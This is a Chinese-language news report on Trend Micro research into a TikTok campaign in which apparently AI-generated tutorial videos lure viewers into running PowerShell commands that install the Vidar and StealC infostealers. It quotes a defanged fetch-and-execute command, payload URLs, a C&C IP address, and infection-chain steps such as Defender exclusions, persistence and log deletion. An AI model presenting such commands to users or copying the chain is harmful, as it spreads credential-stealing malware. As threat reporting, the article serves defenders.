趨勢科技（Trend Micro）最新研究揭露，TikTok平臺正出現一種新型威脅：AI生成的視頻誘騙用戶執行惡意PowerShell命令，使其暴露在強大的信息竊取惡意軟件風險之下。

導致Vidar和StealC惡意軟件的感染鏈條 | 圖片來源：Trend Micro

社交工程攻擊新手法

趨勢科技近期曝光了一起危險的社交工程攻擊活動，黑客利用TikTok的病毒式傳播平臺分發Vidar和StealC——兩種復雜的信息竊取惡意軟件家族。網絡犯罪分子通過AI生成內容和利用用戶信任，將看似無害的視頻教程轉變為惡意軟件傳播載體。

報告指出："這類攻擊使用視頻（可能由AI生成）誘導用戶執行PowerShell命令，這些命令被偽裝成軟件激活步驟。"

攻擊傳播機制

攻擊始于@gitallowed、@zane.houghton和@sysglow.wow等TikTok賬號分享的匿名教程視頻，指導觀眾激活Windows、Spotify或CapCut等軟件。部分視頻播放量超過50萬次，展示的"激活"步驟最終會引導用戶執行如下PowerShell命令：

iex (irm hxxps://allaivo[.]me/spotify)

趨勢科技強調："視頻指示觀眾運行一系列命令...指導語音也疑似AI生成，進一步表明攻擊者使用AI工具制作這些視頻。"

該命令會下載并執行遠程腳本，啟動一個兼具隱蔽性和持久性的惡意軟件投放鏈。

攻擊流程詳解

• 用戶觀看TikTok視頻后直接執行PowerShell命令
• 從hxxps://allaivo[.]me/spotify下載并運行遠程腳本
• 在APPDATA和LOCALAPPDATA創建隱藏目錄，并添加到Windows Defender排除列表
• 下載二級有效載荷——通常是從hxxps://amssh[.]co/file.exe獲取的Vidar或StealC
• 從hxxps://amssh[.]co/script.ps1獲取最終持久化腳本，使惡意軟件能在系統重啟后繼續運行
• 刪除日志和臨時文件夾以掩蓋取證證據

趨勢科技警告稱："腳本采用重試邏輯確保有效載荷成功下載，然后以隱藏的提升權限進程啟動惡意軟件可執行文件。"

新型C&C通信技術

惡意軟件激活后，會使用新型規避技術與命令控制（C&C）服務器通信：

• Vidar利用Steam和Telegram等平臺作為Dead Drop Resolvers（DDR，死投解析器），將真實服務器地址隱藏在個人資料元數據中
• StealC直接連接基于IP的終端（如91[.]92[.]46[.]70）

研究人員指出："Vidar尤其濫用Steam和Telegram等合法服務作為死投解析器。"

AI驅動的惡意軟件新時代

TikTok算法放大效應與AI生成欺騙手段的結合，標志著惡意軟件傳播進入新時代。正如趨勢科技強調："AI生成內容的使用，使這類攻擊從孤立事件升級為高度可擴展的運營活動。"